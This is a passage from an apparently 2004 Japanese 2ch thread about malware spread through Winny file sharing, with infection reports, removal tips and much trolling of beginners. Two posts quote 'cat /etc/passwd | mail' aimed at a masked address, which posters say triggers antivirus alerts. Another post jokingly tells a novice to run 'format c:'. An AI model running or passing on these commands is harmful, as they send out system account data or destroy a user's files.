ある。というかクリックしたのわかってるなら数日経つ前に何か対策しろよ・・・
637[名無し]さん(bin+cue).rar:04/12/01 02:15:14 ID:bZ3UwK5O
>>635
とごげこんとけす、かおあきめんでそ。かぐずうぃてくそけなこしろふぃむ。 
とよけおけかにずかわけむこいそんせかむけしんご。 
かたかみねんこげずすいこむけしこ。 

638[名無し]さん(bin+cue).rar:04/12/01 02:15:59 ID:0VWJ2ODY
639[名無し]さん(bin+cue).rar:04/12/01 05:33:47 ID:d8AHPCc2
ここは初心者の質問スレじゃねぇと(ry
640[名無し]さん(bin+cue).rar:04/12/01 10:43:03 ID:07l1BWqD
スレがスキルある人が集まるようなタイトルだからな〜
ここで答えてくれるかも!みたいに感じるんじゃないかな。
641[名無し]さん(bin+cue).rar:04/12/01 11:14:16 ID:rZ+icOJT
>>637
ゆうていみやおうきむこう
ほりいゆうじとりやまあきら
ぺぺぺぺぺぺぺぺぺぺ・・・
642[名無し]さん(bin+cue).rar:04/12/01 19:10:12 ID:VuOH5bGg
ぺぺぺぺぺぺぺぺぺぺ・・・ぺぺ
だっけ?懐かしいなオイ>DQ2
もーろょ。
643[名無し]さん(bin+cue).rar:04/12/01 19:13:23 ID:j9R59gbh
もょもと
644[名無し]さん(bin+cue).rar:04/12/01 19:56:50 ID:VuOH5bGg
うはっ!誤爆った。もーろょって何だよw
さっきググってきたよ(´・ω・`)/もょもと
FC版DQ2が出た当時俺はまだ小2だったすろ。
いまおもえばあ、のときがいちば。んかがやいてたきが。する
おれのじんせい。おるつ


645[名無し]さん(bin+cue).rar:04/12/01 20:33:18 ID:5G3ZslaK
もう半年ぐらいやってないんだけど、きんたまのウイルスってバスターで駆除できるようになったの?
646[名無し]さん(bin+cue).rar:04/12/01 20:34:53 ID:Ock70IUH
>>645
お前の気合次第
647[名無し]さん(bin+cue).rar:04/12/01 21:09:44 ID:oCenB3jr
あああ
648[名無し]さん(bin+cue).rar:04/12/01 22:07:49 ID:FPKqysDP
ねょ2ふ
649[名無し]さん(bin+cue).rar:04/12/01 23:12:39 ID:2YOObOLI
もょもと ゆうてい みやおう・・といえば

この名前をHDにつけてるよ
650[名無し]さん(bin+cue).rar:04/12/02 07:53:37 ID:YmAXTFJQ
うちの友達がきんたまに感染してデスクトップが晒されたらしい。
自分のメアドに親切な人からメアドさらされてるぞってきたから気が付いたらしい。
とこんな感じのこと言ってた後にこんなことも。
デシカメもってないのにどうやって写真撮ったんだ?って(笑)
聞いてたが教えなかった。
651[名無し]さん(bin+cue).rar:04/12/02 09:52:51 ID:a/6JxieE
自覚ない人ってのはその段階なんだ・・・ニガワラ
652[名無し]さん(bin+cue).rar:04/12/02 10:39:04 ID:ok3QcrYC
>>650
教えてやれよw
性格悪いな、お前。そういうのは友達とは言わんぞ
653[名無し]さん(bin+cue).rar:04/12/02 14:39:41 ID:FFes10dC
PrintScreenの存在すらしらないひとも多いからね。
新人に操作マニュアル作らせたとき、画面の取り込みがわからない
って言われたから、AltとPrintScreenの機能を教えた。

「学校では教えてくれなかった」って喜んでた。orz
654[名無し]さん(bin+cue).rar:04/12/02 16:29:52 ID:YmAXTFJQ
このスレで言われたとおり友達に教えてやった。
そしたらそんな機能なんてないわ!とか言われた後にそいつの回りにいたやつが
画面を写真にするにはデジカメで撮影するしかないんだって。初心者逝ってよしとか言われたがな(笑)
面白いので放置する。
655[名無し]さん(bin+cue).rar:04/12/02 16:51:50 ID:PrLzu3fL
>>654
面白い
656[名無し]さん(bin+cue).rar:04/12/02 18:04:03 ID:1dsZ35Tb
デスク見たら画面いっぱい真っ赤!
まんなかに『ぬるぽ』の文字が…

誰だ!クサマか!?


あーWin起動できない誰かたしけて
657[名無し]さん(bin+cue).rar:04/12/02 18:05:12 ID:htOmXrdK
>>656
死ね
658[名無し]さん(bin+cue).rar:04/12/02 18:09:40 ID:79WOQbcT
>>656
m9っ`Д´) バカミッケ
659[名無し]さん(bin+cue).rar:04/12/02 19:24:26 ID:mcd9EKI2
Winny初めて3ヶ月くらいなんだけどウイルスに引っかかったと思ってないし
何か障害が起きてる訳じゃないんだけどちょっと不安になったんで聞きたいんだけど

気をつけててれば踏まないものなんでしょうか
ここのスレの皆さんは間違って踏んでしまう(意図せず感染する)確率ってどんなもんなでしょう
660[名無し]さん(bin+cue).rar:04/12/02 19:35:23 ID:PhpU2ip5
>>659
ここはny初心者が来るところではありません。
一度感染して痛い目にあった方があなたのためです。
と言いたいところだが、マジレスすると対策してれば感染する確率はかなり低い。

この前の仙台にはしてやられたが。あれはエロゲのインストーラに見せかけてあったからな。
まんまと騙されたわけだ('A`)

まぁ、感染後10分くらいで気づいて切断したから個人情報も糞も無かったわけだが。
661[名無し]さん(bin+cue).rar:04/12/02 21:09:44 ID:iiJSnGrw
>>659
テンプレの対策やってたら、まずは引っかからないと思う。
しかし、「エロ」への探究心は人の判断力を鈍らせる・・・。
662[名無し]さん(bin+cue).rar:04/12/02 21:12:41 ID:pruL/QI4
対策


アクロニスのtrueImageでも買ってきましょう。正常な状態でイメージを作っておけばいざという時フォーマットからやり直さなくても10分くらいで復旧できる。


アンチウイルスはノートンで決まりです。通常使用では強力なバスターやマカフィー、フリーのAVG、avastなどもコレに関しては驚くほど無力です。
ただノートンを入れてれば安心というわけではないので気をつけてください。これらはあくまで2時予防策に過ぎません。


XPproとかなら、制限ユーザーを作ってファイルアクセスに制限をかけまくればソコソコ強力です
663[名無し]さん(bin+cue).rar:04/12/02 21:50:01 ID:2kvMNOCo
>>654
>>そしたらそんな機能なんてないわ!とか言われた

女?

664[名無し]さん(bin+cue).rar:04/12/02 21:56:16 ID:kmWuG8kb
>>663
おとこだって言うだろ。「知らんわ」とかと同じだ。
665[名無し]さん(bin+cue).rar:04/12/02 22:00:17 ID:HGWOw29h
>>660
どんなフェイクだったの?
アイコンがエロゲのインストーラと同じだったの?
インストーラの中に仕込んであったの?
666[名無し]さん(bin+cue).rar:04/12/02 22:23:34 ID:bVtOY4j3
関西人か?
667[名無し]さん(bin+cue).rar:04/12/02 22:58:54 ID:EcwjGkJK
関西人とか関係なく普通に使うyp

もしかして在日ですか?
668660:04/12/02 23:22:07 ID:PhpU2ip5
>>665
>インストーラの中に仕込んであったの?
そこまで手の込んだものじゃなかった。

俺は「こ○ねこ」にやられたんだが、ディスクイメージに入ってたのは
・アイコンがエロゲのインストーラになってるウイルス本体
・ディスクマウント時にウイルスを起動するように書き換えられたAutorun.inf
・645,120,000 バイトのダミーファイル

この三つだけ。オートラン切ってあったんだが、ウイルススキャンして
検出されなかったからインストールするつもりでダブルクリックしてやられますた('A`)

当然インストーラなど起動せず。環境の問題かと思って他のPCでも試した結果、
俺のマシン4台のうち2台が感s(ry
669[名無し]さん(bin+cue).rar:04/12/02 23:41:46 ID:sHCV35wW
あのさ、思ったんだけど、ウィルスなんてほっとけば?
犬みたいなノリで飼ったりとかw
670[名無し]さん(bin+cue).rar:04/12/02 23:53:21 ID:bIl8qBTd
個人情報をいれないなら放置もまた1つの手だな
671665:04/12/02 23:56:51 ID:HGWOw29h
>>668
なるほど。
てことは、真贋はAutorun.infの中身とexeファイルをチェックすれば大体わかるのかな。

最近落として遊んだりしてなかったから
バイナリ関係弄ってゲームと一緒にウィルスとかインスコさせられたのかと思って
かなり焦ったんだが、注意怠らなければまだまだひっかからなくて済みそうかな。
そんなモンが出回り始めたらさすがに手を出しにくくなるよなー。


>>669
これはひどい
672[名無し]さん(bin+cue).rar:04/12/02 23:58:39 ID:bIl8qBTd
そしてインスコ終了後のゲーム本体がホワイターなロジックボムを踏むわけか
673[名無し]さん(bin+cue).rar:04/12/03 03:00:00 ID:OyGyPaPp
shareで流れてるファイルで
ウイルスを仕込んだというダイアログが出るファイルを見つけたんですが
ここで晒してもいいですか?
同じものをnyで探してみたけどなんだか見当たらないので
674[名無し]さん(bin+cue).rar:04/12/03 03:02:19 ID:S8BnJfPg
>>673
しゃれの方にはウイルススレないのか。
いいんでない?最近暇だし。
675[名無し]さん(bin+cue).rar:04/12/03 03:34:20 ID:OyGyPaPp
判りました
オンラインスキャンに思いのほか時間がかかってるんで
もう少し時間ください
676ひみつの文字列さん:2024/08/04(日) 11:41:22 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
677[名無し]さん(bin+cue).rar:04/12/03 04:41:38 ID:lCNdLGVf
しばらく使ってみて怪しいのが動いてるかどうか、レジストリに変な値はないか、
等々調べて異常なければただのダイアログ出すだけのプログラムかと。
というかウィルスが自分から「ウィルス入れておきますね♪」なんてバラスことは
あんまりないんでたぶんダイアログのみだとは思うけど。
678[名無し]さん(bin+cue).rar:04/12/03 05:00:41 ID:S8BnJfPg
>>676
まぁ〜レベルの低い奴もいるもんだなw

俺もただのジョークプログラムだと思うが。
一応しばらくは警戒しといたほうがいいだろ。
679[名無し]さん(bin+cue).rar:04/12/03 05:40:13 ID:KP3Qr6VV
動作状況については確認してないんだが、以前、nyに流れてたやつで
「予約特典.exe」という名称のトロイだかワームがあったような…記憶が遠くてスマソ
680[名無し]さん(bin+cue).rar:04/12/03 06:09:26 ID:Lk+ABheE
>>679
予約特典じゃなく、次回予告だったような…
681[名無し]さん(bin+cue).rar:04/12/03 06:51:47 ID:S2HBFfU/
初歩的な質問ですいませんが、ウイルス踏んだら、復元しただけじゃだめなんですか?
おかしくなったら、復元して普通につかってたのですが。
682[名無し]さん(bin+cue).rar:04/12/03 07:49:15 ID:HRmo3sLx
>>681
そう、それでいい・・・
683[名無し]さん(bin+cue).rar:04/12/03 08:15:09 ID:UxEgB9Pg
>>681
やばいよ
今すぐPCを窓の外に投げ捨てなさい
684[名無し]さん(bin+cue).rar:04/12/03 08:26:11 ID:MogSdLjp
ウィルスにかかったら悪魔払いの儀式が必要だよっ!!
685[名無し]さん(bin+cue).rar:04/12/03 08:34:18 ID:MVBKeBr2
>>681
お前みたいのがいるから俺が亜ボーンになったんじゃねーか
フォーマットしやがれ!

ついでに感染後の保存ファイルは全部破棄しろ
686[名無し]さん(bin+cue).rar:04/12/03 11:49:59 ID:+oBHG9OC
>>681
テンプレを読んでるならそんなアホな書き込みはしないはずだが。
687[名無し]さん(bin+cue).rar:04/12/03 12:36:41 ID:Lk+ABheE
>>684
とごげこんとけす、かおあきめんでそ。かぐずうぃてくそけなこしろふぃむ。 
とよけおけかにずかわけむこいそんせかむけしんご。 
かたかみねんこげずすいこむけしこ。 

688[名無し]さん(bin+cue).rar:04/12/03 14:09:17 ID:eYWS/BPl

 よ
 た
689[名無し]さん(bin+cue).rar:04/12/03 19:38:12 ID:nwyk6hMd
昨日寝るときにwinnyを接続したまま(PCつけっぱなんし)にしてて
朝起きてディスプレの電源入れてみるとwinnyが終了しててIEとかも全部
終了してた
おそらく再起動したんだと思うけど勝手に再起動とかすることってあるんですか?
ウイルススキャンしてみたけど検出はなし(念のためオンラインスキャンも2サイトした)
気になることといえばAGVのタスクに常駐してるのが日本語じゃなく英語になって
しまってる事(初めから英語だったっけ?)
690[名無し]さん(bin+cue).rar:04/12/03 19:52:02 ID:yolazy7p
>>689
ハードウェアが原因で突然再起動することはある。
691[名無し]さん(bin+cue).rar:04/12/03 20:12:45 ID:nwyk6hMd
>>690
ウイルス的なものは気にしなくて大丈夫ですよね(現に検出されなかったわけですし)
昨日凄く寒かったのとか関係あるのかな?
システム温度が10度代まで下がってたし
692[名無し]さん(bin+cue).rar:04/12/03 20:18:06 ID:7Q8CQWji
温度が下がればPCはむしろ好調なはずだがな
気温下がりすぎで結露するような環境に置いてるならただの馬鹿

つーか、基本がわからないような馬鹿はnyなんてやめろって
693[名無し]さん(bin+cue).rar:04/12/03 20:24:17 ID:zhlbffbx
>>692
釣りを釣りと見抜けない人は(ry
694[名無し]さん(bin+cue).rar:04/12/03 20:28:51 ID:M334agQd
winnyのダウンフォルダにあった全ファイルを
謎の男の顔の画像に変換しつつexeファイルにして、UPフォルダに勝手に入れるウイルスに感染しました。
一応ウイルス検索して処理はしてみたものの、まだなんかあるんじゃねーかと思ってしまい安心できません。
どなたか、このウイルスの詳細(対処方法)を知っている方がいたら、ご教授ください。
695[名無し]さん(bin+cue).rar:04/12/03 20:32:52 ID:7Q8CQWji
696[名無し]さん(bin+cue).rar:04/12/03 20:36:51 ID:+6WfR+ED
>>694
自分でググレないやつは再インストが確実。
697[名無し]さん(bin+cue).rar:04/12/03 20:43:55 ID:zhlbffbx
自分でググれてもフォーマットしたほうが安心は安心
698[名無し]さん(bin+cue).rar:04/12/03 21:07:46 ID:xrNgvPpx
>>694
俺はそれ+JPGファイルがぬるぽふぁいるに変わるという
糞なウィルス踏んだ
マジ死にてえ
699[名無し]さん(bin+cue).rar:04/12/03 21:17:53 ID:KP3Qr6VV
>>698
何しても、自由だヨ。迷惑かけるなよ、うぜぇから
700[名無し]さん(bin+cue).rar:04/12/04 01:32:29 ID:/cGuLVpa
最近のnyはウィルス多いな。
駆除とかいちいちすんのがマジでまんどくさい。
701ひみつの文字列さん:2024/08/04(日) 11:41:22 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
702[名無し]さん(bin+cue).rar:04/12/04 01:56:14 ID:QEFpwkjD
>>701
わざわざ落とせと?

せめて「なぜウイルスだと思ったのか」くらい書けや。
703[名無し]さん(bin+cue).rar:04/12/04 02:13:17 ID:xTNa20Bk
nyクラックしててUL0の設定なのに次々にUPされる、なぜ?
この症状は今日はじめて起きました
704[名無し]さん(bin+cue).rar:04/12/04 02:15:01 ID:zjqzvAk1
>>703
ウィルスだよ
705[名無し]さん(bin+cue).rar:04/12/04 02:16:47 ID:xTNa20Bk
やばいUPしたらつかまるんでしょ?
早く対処法おしえて
706[名無し]さん(bin+cue).rar:04/12/04 02:19:54 ID:sGIpXzGi
>>705
名前欄にFushianasanといれてみろ。
707[名無し]さん(bin+cue).rar:04/12/04 02:49:55 ID:zjqzvAk1
>>705
nyをやめる。
これで安心!
708[名無し]さん(bin+cue).rar:04/12/04 02:52:11 ID:ZDchUqOW
>>705
マウスを口にくわえて「タイガーマスク」と連呼しろ
すぐに治るはず
709[名無し]さん(bin+cue).rar:04/12/04 03:00:16 ID:j+XLW/+f
どんな民間療法だ
710[名無し]さん(bin+cue).rar:04/12/04 03:08:03 ID:ZC0FbLv2
>>708-709 ワロタ

>>706
fusianasanじゃなかったか?と釣られレス
711[名無し]さん(bin+cue).rar:04/12/04 07:17:16 ID:DBIV+MN5
>>708
ごっつかよ
712[名無し]さん(bin+cue).rar :04/12/04 10:56:57 ID:dLx5NCFC
対処方法の伝授ご教授願います。

落としたファイル
【IV】 杏さゆり - anzu n'roses(DivX+Ogg).avi

テンプレは既読で、対処もしましたが問題無かったです。
動画j自体も問題無く再生できます。

困っている症状はwinnyフォルダのdownにある対象のファイルを右でも左でもクリックすると
「InternetExploreのエラー」と小さめウインドウ出ます。
そのままエラーのウインドウを閉じれば問題無いこともありますが、
フリーズすることも一度ありました。

文章構成ヘタで須磨祖w
713[名無し]さん(bin+cue).rar:04/12/04 11:01:59 ID:mXOqEFWk
aviで感染なんて聞いた事ない。
714[名無し]さん(bin+cue).rar :04/12/04 11:09:08 ID:dLx5NCFC
いや、俺もそう思うんだけどさ、

Explorer.EXE
問題が発生したためExplorer.EXEを終了します。って出るんですよ。
なんか良く見るメッセージだけど。
クリックすると必ず出るんで何かな、と。

まぁこのウインドウ放置しても普通に作業できるんで実害は無いんだけど
如何せんチキンな者で気になる。
715[名無し]さん(bin+cue).rar:04/12/04 11:09:50 ID:GorsWXiI
文章構成ヘタで須磨祖w
文章構成ヘタで須磨祖w
文章構成ヘタで須磨祖w
文章構成ヘタで須磨祖w
文章構成ヘタで須磨祖w
文章構成ヘタで須磨祖w
文章構成ヘタで須磨祖w
文章構成ヘタで須磨祖w
文章構成ヘタで須磨祖w
文章構成ヘタで須磨祖w

716[名無し]さん(bin+cue).rar:04/12/04 12:43:36 ID:3thM+3I4
gomiユーザーは氏ね
717[名無し]さん(bin+cue).rar:04/12/04 13:06:14 ID:eOA0ehqN
「モンチョビーン・Vcfmesm2b…総合スレ40」をダボークリックしたら
ノートン先生が「Unix.Penguin」を検出 削除したぞ って怒られた
718[名無し]さん(bin+cue).rar:04/12/04 13:08:35 ID:zTUjrOZn
255 名前:[名無し]さん(bin+cue).rar[cat /etc/passwd | mail [email protected]] 投稿日:04/12/04(土) 12:57:15 ID:/8YBJ1n7


こいつが原因
719[名無し]さん(bin+cue).rar:04/12/04 13:15:27 ID:vlqMYdsT
>>712-714
AVIファイルが壊れてるだけ、それで落ちるのはExplorerの仕様だから
ぐぐって解決法を探せ

新種は出ないね。
720[名無し]さん(bin+cue).rar:04/12/04 13:30:20 ID:53UqPMSq
>>717
お前みたいな低スキルの持ち主はダウソなんてやめろ
721[名無し]さん(bin+cue).rar:04/12/04 13:32:48 ID:/EddYldI
>>711
ワラタw
722[名無し]さん(bin+cue).rar:04/12/04 15:08:29 ID:ttVtD70D
Winnyを起動したらWinnyPatch.exeはTrojan.Whiterに感染しています。と怒られたので
慌てて全スキャンするとバックアップしていた別ドライブのWinnyフォルダと圧縮した分にも
感染してました。
感染経路はWinnyが原因とは思うんですがルータからすり抜けて仕込まれることもあるのでしょうか?
このウィルスの進入経路の例を教えていただければありがたいです。
723[名無し]さん(bin+cue).rar:04/12/04 15:10:34 ID:3thM+3I4
shine
724[名無し]さん(bin+cue).rar:04/12/04 15:19:41 ID:e6Pu0Peb
シャイン(゜∀゜)
725[名無し]さん(bin+cue).rar:04/12/04 15:31:10 ID:sAOZ/ot2
>>722
あ〜あ。ホワイターか。ご愁傷様。

そんなこともわからない初心者様はWinnyやめた方がいいよ。
冗談じゃなくて。

Trojanとつくのはトロイの木馬。トロイの木馬は純粋なワームと違って
ネットワークから直接進入してくるわけじゃない。

あなたが落としたファイルの中にトロイが混じってて、あなた自身がトロイを実行して
そこで初めてシステムに感染する。
自業自得ですね。
726[名無し]さん(bin+cue).rar:04/12/04 15:50:15 ID:vlqMYdsT
>>722
>Winnyを起動したらWinnyPatch.exeはTrojan.Whiterに感染しています。
2点ある。まず1点目、Trojan.Whiterはファイル上書きもの、発動したらさようなら。
次、WinnyPatch.exeには(どのバージョンを使ってるかは知らんが)、
兇徒府警へのメール砲が仕込まれてる。これまた、さようなら。

結果、おびえて暮らせ
727[名無し]さん(bin+cue).rar:04/12/04 16:06:34 ID:sGIpXzGi
>Winnyを起動したらWinnyPatch.exeはTrojan.Whiterに感染しています。

tu-ka
WinnyPatch.exeって何よ?
Up0パッチか?
728[名無し]さん(bin+cue).rar:04/12/04 16:18:58 ID:mXOqEFWk
>>727
nyで落としたんだろーなw
729[名無し]さん(bin+cue).rar:04/12/04 16:21:55 ID:WINl9FbT
何かここに久しぶりにきたら、datがウイルスに感染してます。って・・・・・。   orz
まあ、削除されたみたいだけど・・・・・。
730[名無し]さん(bin+cue).rar:04/12/04 16:22:42 ID:sGIpXzGi
アフォめ。
転送すらしないくせに一丁前に質問なんてしてやがるのか。
731729:04/12/04 16:26:30 ID:WINl9FbT
何か更新されるたんびに警告・・・・・・。
みんな、鳴る?
732[名無し]さん(bin+cue).rar:04/12/04 16:27:59 ID:EeIYGF8p
cat /etc/passwd | mail nobody
http://pc5.2ch.net/test/read.cgi/win/1102042958/
733[名無し]さん(bin+cue).rar:04/12/04 16:30:57 ID:OnAgGE8o
HDD全消しのファイルって何よ?
734ひみつの文字列さん:2024/08/04(日) 11:41:22 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
735[名無し]さん(bin+cue).rar:04/12/04 16:37:47 ID:OnAgGE8o
>>734

スマソ、もっと軽い奴ないか?
736ひみつの文字列さん:2024/08/04(日) 11:41:22 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
737ひみつの文字列さん:2024/08/04(日) 11:41:22 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
738[名無し]さん(bin+cue).rar:04/12/04 16:55:05 ID:ttVtD70D
>>727>>730
かなり前に試したことはありますがすぐにもどしました。
転送してるし保持もしてますよ。
739[名無し]さん(bin+cue).rar:04/12/04 17:01:36 ID:ZvIsrqB0
>>736
同じ奴を持ってるがこっちでは何も問題なし
740ひみつの文字列さん:2024/08/04(日) 11:41:22 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
741[名無し]さん(bin+cue).rar:04/12/04 17:13:38 ID:sGIpXzGi
>>738
そうか。
それはすまんかった。
742[名無し]さん(bin+cue).rar:04/12/04 17:54:32 ID:fVJrcnRY
exeとかはVM落として仮想環境作って先にそこで実行しろよ
743722:04/12/04 19:36:56 ID:ttVtD70D
>>739
確認アリガd。

検索したらWinny2b7.1クラックパッチにこのファイルあるとわかってリストを調べたら
1年前に落したブツのようでなんで今ごろ反応したのかわからないなあ。
744[名無し]さん(bin+cue).rar:04/12/04 20:00:43 ID:FhNzkE/B
>>729 お前邪魔だよ 消えろ初心者
745[名無し]さん(bin+cue).rar:04/12/04 20:04:55 ID:hI1HJkbG
>>743
日記は(ry
746[名無し]さん(bin+cue).rar:04/12/04 21:32:12 ID:TS75rdhv
>714

ウィルスとは関係ないかもしれんが
DLLファイル自体の破損、HDD自体の問題(欠陥クラスタ等ね)も考えられる。

取り合えずDOS上ででもHDDスキャンするなりしてみれば?
挙動が怪しくなっってきたら早めにバックアップ取るなりして
クリーンインスコ+スキャンディスクが手っ取り早いと思うけど。

ほっとくとチェーンクラスタとかイパーイ出て
ある日突然HDD燃え尽きる事もあったし気をつけてな。
747[名無し]さん(bin+cue).rar:04/12/04 23:02:30 ID:dEz+7UPE
>>714
グラボのドライバをUpdateしてみるとか
俺はそれで直った
748[名無し]さん(bin+cue).rar:04/12/05 00:10:59 ID:PwjweCq+
>718
肝心な部分を伏字にする 知能がねえのか ボケ
749[名無し]さん(bin+cue).rar:04/12/05 01:28:50 ID:xqocPuZC
>>748
そんなことに、いちいち目くじら立てるほど、枯れてないやつは去れ
750[名無し]さん(bin+cue).rar:04/12/05 01:33:50 ID:P2A9wB4E
>>749
お前>>718か?まぁどっちでもいいが、>>718が考え無しだったことは事実だろ。

俺もノートン先生がうるさくて除外設定する羽目になったじゃねぇか。
751[名無し]さん(bin+cue).rar:04/12/05 01:39:07 ID:4WoYuN1c
光回線に変えた直後検索トリップにai,yuusyaなどが勝手に出てくるのですがウイルスに感染してるのでしょうか?
752[名無し]さん(bin+cue).rar:04/12/05 01:39:17 ID:pv8KRSm7
普通にキーワード置き換え機能使った。
753[名無し]さん(bin+cue).rar:04/12/05 01:50:35 ID:xqocPuZC
>>750
718じゃないけど、先生の誤動作なんだから、そっちに文句いえよ。
つか、先生のリアルタイムスキャンなんて使ってるようでは、まだ修行が足らんぞ。
754[名無し]さん(bin+cue).rar:04/12/05 02:09:17 ID:zpTAPqVJ
rm9っ`Д´) ビシッ
755[名無し]さん(bin+cue).rar:04/12/05 03:37:07 ID:WY4gSctr
>>701
mellpoって奴かな?
シャレの方は良く分からんし、情報が少なすぎる。

落としてVMで実行したら、mellpoとかってフォルダやらバッチファイルが
出来たから、ちょっとググってみただけだけどShare用のキンタマっぽいね。
756[名無し]さん(bin+cue).rar:04/12/05 04:58:18 ID:LP0UmApv
島んてっくのノートンと併用してナントカ駆除できたんだが(SillyP2Pって表示されるANTINNY_P)
既出かもしれないけど 一応駆除対応方法書いとく

トレンドマイクロとかに書いてる方法だが

レジストリエディタ開いて

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ってトコロ開いたら右画面にズラズラーって色々出てくると思うけど、その中にある

System = "<Windowsフォルダ>\Exploder.exe"
もしくは
System32 = "<Windowsフォルダ>\svchost32.exe "

ってやつを削除汁。
そのあと再起動した後system32フォルダをスキャンしたら自動削除してくれる・・はず
漏れは一応これで再インスコなし フォーマットなしで立ち直った・・・。

初心者なりになんとかがんばってみたv( ̄Д ̄)v
概出ならスルーしといてくり・・・( ´_ゝ`)
757[名無し]さん(bin+cue).rar:04/12/05 06:44:33 ID:s4ksvSC8
unix penginって何ですか?
ここに来るたんびに脳豚さんが警告発して削除してるみたいなんですけど・・・・。
誰か教えて・・・・。   orz
758[名無し]さん(bin+cue).rar:04/12/05 06:52:30 ID:EeUcC8wl
>>757
俺も気になる
Live2chがいつも感染してやがる
759[名無し]さん(bin+cue).rar:04/12/05 06:57:26 ID:5ZGZDwsz
log置かれるところ除外しろよ
760[名無し]さん(bin+cue).rar:04/12/05 07:10:51 ID:rcNIPTRl
思いついた。
キンタマ系ウィルス亜種を作る方々へ。
次は2chブラウザの書き込みログを狙ってちょうだい。
761[名無し]さん(bin+cue).rar:04/12/05 08:17:30 ID:wOh741Nm
>>758
Live2chが感染とかマジうけるw
762[名無し]さん(bin+cue).rar:04/12/05 08:19:48 ID:bL6tuHAB
>>757-758
恥ずかしい奴等め。初心者板へ逝って聞いて来い
お前らにダウソ板は早すぎる。半年以上ROMれ


763[名無し]さん(bin+cue).rar:04/12/05 08:31:28 ID:R33gGF6a
>>757
nyと関係ないしマジレスしておくとテキストに書かれたスクリプトにノートソが反応してるだけ


IEベースじゃない2chブラウザとかだと何の関係も無い。


>>759が言うようにノートソの除外設定に2chブラウザのフォルダをいれとけばOK

IEでそのまま見てるなら2chブラザを使うべし
764[名無し]さん(bin+cue).rar:04/12/05 11:39:15 ID:0F4I5cL/
Live2chがいつも感染してやがるw
765[名無し]さん(bin+cue).rar:04/12/05 11:56:35 ID:BB46fhgo
Live2chをnyで落としてんの?
766[名無し]さん(bin+cue).rar:04/12/05 12:50:20 ID:PG6ljHCR
どなたか、ローカルエリア接続をダブルクリックしても開かなくなったこと、
ありますか?safeモードでは開くのですが、通常起動では、まったく開きません。
お願いします。
767[名無し]さん(bin+cue).rar:04/12/05 12:51:10 ID:jjOXLNiB
お願いされても困ります。
768[名無し]さん(bin+cue).rar:04/12/05 12:57:58 ID:SDrI+h0F
ダブルクリックされても困ります。
769[名無し]さん(bin+cue).rar:04/12/05 13:16:38 ID:Pl42Hyg5
WinnyFileDatabaseの情報って嘘も書かれてる?
770[名無し]さん(bin+cue).rar:04/12/05 14:13:16 ID:R33gGF6a
やばい、なんか大変なことになった。とりあえずnyとか切断したけど
こんな感じなんだけど、とりあえずアドバイス求む。


ttp://www.ehonnavi.net/images/ehon4076.jpg
771[名無し]さん(bin+cue).rar:04/12/05 14:22:36 ID:pv8KRSm7
>>770
ああ、それ見覚えあるな
772[名無し]さん(bin+cue).rar:04/12/05 14:25:17 ID:/xemjRwN
読んだことある
773[名無し]さん(bin+cue).rar:04/12/05 14:56:27 ID:jjpt/DQ1
こんなことでも楽しいんだろうな、厨は
774[名無し]さん(bin+cue).rar:04/12/05 15:40:43 ID:Znynk/kd
ウザイ儲け情報 ....(中略).pif

とかいうファイルがシェルのパス文字数制限を超えてて消すのが
面倒だった。
775[名無し]さん(bin+cue).rar:04/12/05 16:48:23 ID:eTyXMKFP
【使用OS】 WinXP HE SP1
【WindowsUpdateしてるか】 no
【AntiVirusは】 no
【ちゃんとUpdateしてるか】 no
【スキャンした結果】 してません
【オンラインスキャンしたならその結果は】 ワームが数個
【Winnyのバージョン】 β7.1
【Winny歴、総DL量は】 1.14で安定した頃から。100Gぐらい。
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 はい
【症状か具体的に、分かる限りすべて書く】症状は出ていないみたいです。
【何をしたらそんなことになったのか】 .folderを起動しました。
【これまでにとった措置】テンプレに書いてある症状がまったくでません。
レジストリにも変な値はありません。.folderを押してからかれこれ5ヶ月以上たってると思います。
776[名無し]さん(bin+cue).rar:04/12/05 16:50:05 ID:wOh741Nm
>>775
知るか
777757:04/12/05 17:10:04 ID:s4ksvSC8
>>759>>763氏、dクス!
そうなのか・・・・・。
ちょっと納得・・・。
778[名無し]さん(bin+cue).rar:04/12/05 17:13:03 ID:U0m6SijH
>>775
君のパソコンには、

とごげこんとけす、かおあきめんでそ。かぐずうぃてくそけなこしろふぃむ。 
とよけおけかにずかわけむこいそんせかむけしんご。 
かたかみねんこげずすいこむけしこ。 

の文字列があるだろ! rm9っ`Д´) 
 
779[名無し]さん(bin+cue).rar:04/12/05 17:15:02 ID:ENnDfjoM
>>775
【WindowsUpdateしてるか】 no
【AntiVirusは】 no

この時点でダメ過ぎ。
見えないところでどれくらい飼ってるのか想像もできんな。
おまいがオンラインにいるのは、培養基を人ごみで割るような
もんだ。
780[名無し]さん(bin+cue).rar:04/12/05 17:18:41 ID:Qbshn+mw
>>775
はい。DOS プロンプトにいって、「format c:」とタイプしましょう。
781[名無し]さん(bin+cue).rar:04/12/05 17:22:34 ID:jsf3UpSE
>>775
なんでお前みたいなバカがnyしてるんだ、迷惑以外の何者でもないだろ
他人に迷惑かけるだけだから今すぐやめろ。
782[名無し]さん(bin+cue).rar:04/12/05 17:56:46 ID:/eBxzo8C
【使用OS】XP
【WindowsUpdateしてるか】はい
【AntiVirusは】はい
【ちゃんとUpdateしてるか】はい
【スキャンした結果】できません
【オンラインスキャンしたならその結果は】できませんでした
【Winnyのバージョン】β7.1
【Winny歴、総DL量は】1年ぐらい
【テンプレを読んだか】はい
【テンプレにある対策を実行したか】はい
【症状か具体的に、分かる限りすべて書く】アプリケーションファイルのファイルの種類が「ぬるぽ」になった
【何をしたらそんなことになったのか】なんかへんなインストーラーを実行してしまった。
【これまでにとった措置】ネットにはつながない
いろいろ探したけどどんな対処法があるのかいまいちわかりません。
どうか教えてください。
783[名無し]さん(bin+cue).rar:04/12/05 18:01:28 ID:wOh741Nm
>>782
